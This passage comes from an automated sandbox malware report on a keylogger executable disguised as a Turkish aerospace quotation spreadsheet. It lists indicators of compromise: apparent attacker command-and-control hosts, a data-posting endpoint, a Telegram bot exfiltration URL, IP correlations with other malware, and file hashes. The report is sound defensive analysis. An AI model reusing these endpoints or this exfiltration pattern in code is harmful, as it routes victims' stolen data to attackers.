                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000002.00000002.3940377959.00000000028C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.ecosia.org/newtab/RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://varders.kozow.com:8081TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  high
                                                                  http://aborters.duckdns.org:8081TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://anotherarmy.dns.army:8081TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                        high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://checkip.dyndns.org/qTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            high
                                                                            https://chrome.google.com/webstore?hl=enlBRegSvcs.exe, 00000002.00000002.3940377959.00000000028BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://reallyfreegeoip.org/xml/8.46.123.189$RegSvcs.exe, 00000002.00000002.3940377959.000000000277B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.00000000027C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://reallyfreegeoip.orgRegSvcs.exe, 00000002.00000002.3940377959.0000000002751000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.00000000027C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://reallyfreegeoip.org/xml/TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.0000000002751000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          149.154.167.220
                                                                                          api.telegram.orgUnited Kingdom
                                                                                          62041TELEGRAMRUfalse
                                                                                          104.21.67.152
                                                                                          reallyfreegeoip.orgUnited States
                                                                                          13335CLOUDFLARENETUSfalse
                                                                                          193.122.130.0
                                                                                          checkip.dyndns.comUnited States
                                                                                          31898ORACLE-BMC-31898USfalse
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1576047
                                                                                          Start date and time:2024-12-16 13:36:03 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 8m 1s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:7
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:TEKLF STE - TUSA TRK HAVACILIK UZAY SANAY_xlsx.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@3/2@3/3
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 50%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 52
                                                                                          • Number of non-executed functions: 270
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target RegSvcs.exe, PID 4780 because it is empty
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          • VT rate limit hit for: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                                                                                          TimeTypeDescription
                                                                                          07:37:09API Interceptor10288145x Sleep call for process: RegSvcs.exe modified
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          149.154.167.220SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, XmrigBrowse
                                                                                                  RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                                                    3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                      Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                          hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              104.21.67.152PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                              hesaphareketi-01.pdfsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  193.122.130.0REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  AsyncClient.exeGet hashmaliciousAsyncRAT, HVNC, PureLog StealerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  Malzeme #U0130stek Formu_12102024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  jXN37dkptv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  UBS20240190101.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  checkip.dyndns.comPURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                  • 158.101.44.242
                                                                                                                                  SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 193.122.6.168
                                                                                                                                  REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 158.101.44.242
                                                                                                                                  SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 193.122.130.0
                                                                                                                                  file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                  • 193.122.130.0
                                                                                                                                  Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 158.101.44.242
                                                                                                                                  file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 132.226.8.169
                                                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 132.226.8.169
                                                                                                                                  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 132.226.8.169
                                                                                                                                  77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 158.101.44.242
                                                                                                                                  reallyfreegeoip.orgPURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 172.67.177.134
                                                                                                                                  file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 172.67.177.134
                                                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 172.67.177.134
                                                                                                                                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 172.67.177.134
                                                                                                                                  api.telegram.orgSWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  TELEGRAMRUfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                  • 149.154.167.99
                                                                                                                                  njrtdhadawt.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                  • 149.154.167.99
                                                                                                                                  T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                  • 149.154.167.99
                                                                                                                                  SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, Vidar, XmrigBrowse
                                                                                                                                  • 149.154.167.99
                                                                                                                                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                  • 149.154.167.99
                                                                                                                                  lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                  • 149.154.167.99
                                                                                                                                  Setup.msiGet hashmaliciousVidarBrowse
                                                                                                                                  • 149.154.167.99
                                                                                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                                                                                                                                  • 149.154.167.99
                                                                                                                                  CLOUDFLARENETUSPO.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                  • 104.26.13.205
                                                                                                                                  https://www.sendspace.com/pro/dl/m2hhc1Get hashmaliciousUnknownBrowse
                                                                                                                                  • 104.17.25.14
                                                                                                                                  https://protect.checkpoint.com/v2/r02/___https://url1251.popmenu.com/qxdhqnhp?zus=z556.WRHPCjsgt/tA51B6LI9w4BubTYwM5p/-7KrggkVEpmPU5/oVFKKM8Rk6rAnqtQtILc2Q2H_3u9DiXC41Sfynx8MyN*~*gGwOol/aO3BY*~*pgD37kbc4-7KGmCSO4DHGqcB*~*D2S053knP-7G*~*y37ScDgrX/lhFDF7r7h5Gwz-7GtvZLu*~*h33zX5RXwSF0oDJX34CSZAvVXm4AFQJ-7Gq-7KxI/mcm4qvQmbxushMLQI9uHWfHKaPI5mifSCu5iVBRcvqUxu7JB4CzzH*~*tp7hI*~*P2JxcRqKbjQDa1m4EV2vJju-7KXGYhKkA/NMg4b3nlprWADF7NLfLtJTf5xKVlxz1PBE*~*XIwKJANjSZxzJHsTEzwI07xTpBPmh9cjRp3bNxF-8I___.YzJlOm1zbm90aWZ5OmM6bzphNDQ0NjUwYTgwNjk4YzE1YzQzODY0NjgzZWZkNGFjNzo3Ojk1N2U6NjEyMTFiMTNiOTljZDFhYmUzOWRiNzM5NDE0NGE3NDNhMDJkZjlhMmI1NzgzMzhlZTAwMjhmZTBkODVlNWNmZDpoOlQ6VAGet hashmaliciousUnknownBrowse
                                                                                                                                  • 104.17.25.14
                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                  • 172.67.220.198
                                                                                                                                  https://login.corp-internal.org/17058d3d8656ed69?l=27Get hashmaliciousUnknownBrowse
                                                                                                                                  • 104.16.99.29
                                                                                                                                  https://www.sendspace.com/pro/dl/m2hhc1Get hashmaliciousUnknownBrowse
                                                                                                                                  • 104.17.25.14
                                                                                                                                  rQuotation.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                                                                                                                  • 172.67.153.63
                                                                                                                                  https://afw.soundestlink.com/ce/c/675c127e5a5226f9e7b86686/675c13ae85cd17d1e3e2ab54/675c13c9f9a08fb1fbb3e577?signature=3f4d77f7452e61cf1e0cb9ce4a3540d02af0944caf975b089573a2fc1d891103Get hashmaliciousUnknownBrowse
                                                                                                                                  • 172.67.163.209
                                                                                                                                  http://898.tv/LantekqsGet hashmaliciousUnknownBrowse
                                                                                                                                  • 104.16.62.16
                                                                                                                                  Herinnering.msgGet hashmaliciousUnknownBrowse
                                                                                                                                  • 172.66.0.227
                                                                                                                                  ORACLE-BMC-31898USPURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                  • 158.101.44.242
                                                                                                                                  SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 193.122.6.168
                                                                                                                                  REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 158.101.44.242
                                                                                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 147.154.242.4
                                                                                                                                  SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 193.122.130.0
                                                                                                                                  file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                  • 193.122.130.0
                                                                                                                                  Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 158.101.44.242
                                                                                                                                  elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                  • 140.204.52.53
                                                                                                                                  77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 158.101.44.242
                                                                                                                                  AsyncClient.exeGet hashmaliciousAsyncRAT, HVNC, PureLog StealerBrowse
                                                                                                                                  • 193.122.130.0
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  54328bd36c14bd82ddaa0c04b25ed9adPURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  Tvl72VM6PM.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  Tvl72VM6PM.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0ePO.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  rQuotation.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  invoice.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  rDOC24INV0616.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  https://t.co/eSJUUrWOcOGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  InvoiceNr274728.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  A6IuJ5NneS.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  KlarnaInvoice229837.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  Arrival Notice.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  No context
                                                                                                                                  Process:C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):131260
                                                                                                                                  Entropy (8bit):7.927629359842594
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:GXd3q/RvJrnoMEIY3o+VoHWZVCnMinmUysUXuimfTU:Wa9JLKon0SiqTU
                                                                                                                                  MD5:B786E54FFB3DE50B5154B4255F156F4A
                                                                                                                                  SHA1:387972FA1376F21A589E0C54473EC0961A2792EE
                                                                                                                                  SHA-256:A7442736F4CD5413DBB215DCCEA715ED6A1C5AE952AB4B7639A95F34416265AE
                                                                                                                                  SHA-512:DE1DFC2B55C97353C5133E5F8065081558F4C9BBF1021B7CCB348619FF107E0DAD8A2D3633381A70C8091A3F65B13B2114EAAF7DA94B031F923B4CDA278D954D
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:EA06..0........oD..&u]n.sD.L.t.}2.U.L@.J...R..h.@.\...~.X..O.b....7)m..#.H.B.Z.Z...t.P.E...vu&...1J..Io...K../).J*..Rg`.T...1...g....4.CU.L'Sh.f.)..2..\D.5..."..C&....4......Vh.'...F...Vd.+..V%..$.:]h...Lf2p..R@4.9....V3=.H.`..5RoK..~|."?@....:.h.W....o..*.w)..@...p......H.T.o ..vs9....I4...4..._O.~."."%..V..e...d.U..*.p.B.0...!.:.@.....T.....*Si.J..U3..8..X.T.M&t.WV.A..~..*g..........W...Zi7.....:..!..DT......`.R..T[......O.T%..D..P......B...M...`.I*...T.e.......Z.2sU.e.Vi...S(5..Jc7.vi.:.ZU..M'<.M>.E.Ef3....D..o.$.gN.S...|.e..4.D..Y.....~.L..Qy...c.L..+.~.7....ej........2o..J..I.....~$3...k..*..<..p....[t..0..c.K...Y.Vg...f.4..I...nSF..@$.nu:....Je..N.Lf...23K.vf.I...h.......;f..@........@*.UV5...(..Db.x....I.>.O.X.rY..go..2.%fs@.............Lyu ...6....omfg%.....\....f3....v.........S..{.zcO..4.....:..T..~.@..f.J../K.Jb9@.R...Pjs..oF...uZ.fwG..t.]:.(..I..}2c...*..=..I.P.)..{D..7.@.)...1..e..Q.*`......M.4......Mi.P..3.V.....IM..:.*..u...%....a
                                                                                                                                  Process:C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                                                                                                                                  File Type:SVr2 curses screen image, big-endian
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):274432
                                                                                                                                  Entropy (8bit):6.837989100231251
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:hOCWm/dAZdjO0aHta8ZIuaqe6a2EauSVVmaXYFn1rnU:8CWm1ajO1ta9DsuSmp1rnU
                                                                                                                                  MD5:6880758A850062FD30B92F05A84AF4A2
                                                                                                                                  SHA1:DF25C701A9C45EF5F737A6A85565D25C6305E761
                                                                                                                                  SHA-256:43D57E4EB75AD957405A8CD679AC2BFE0A2DB85364894767BB2921117F45512C
